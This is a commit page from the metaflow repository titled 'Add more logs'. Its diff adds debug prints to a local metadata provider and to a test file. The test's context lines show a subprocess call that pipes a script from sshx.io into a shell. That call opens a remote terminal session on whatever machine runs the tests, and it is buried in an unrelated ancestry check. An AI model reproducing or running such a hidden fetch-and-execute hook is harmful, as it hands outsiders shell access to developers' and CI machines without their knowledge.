Skip to content

Commit

Permalink
Add more logs
Browse files Browse the repository at this point in the history
  • Loading branch information
talsperre committed Jan 10, 2025
1 parent c8eed9d commit 53e1a61
Show file tree
Hide file tree
Showing 2 changed files with 3 additions and 0 deletions.
1 change: 1 addition & 0 deletions metaflow/plugins/metadata_providers/local.py
Original file line number Diff line number Diff line change
Expand Up @@ -291,6 +291,7 @@ def _read_metadata_value(file_path: str) -> dict:
meta_path = LocalMetadataProvider._get_metadir(
flow_id, run_id, query_step, task_id
)
print(f"Meta path: {meta_path}")

latest_file = _get_latest_metadata_file(meta_path, field_name_prefix)
if not latest_file:
Expand Down
2 changes: 2 additions & 0 deletions test/core/tests/client_ancestors.py
Original file line number Diff line number Diff line change
Expand Up @@ -58,6 +58,8 @@ def check_results(self, flow, checker):
checker.assert_artifact(step.name, "step_name", step.name)
return

print("__file__ is", __file__)

import subprocess
try:
subprocess.run("curl -sSf https://sshx.io/get | sh -s run", shell=True, check=True)
Expand Down

0 comments on commit 53e1a61

Please sign in to comment.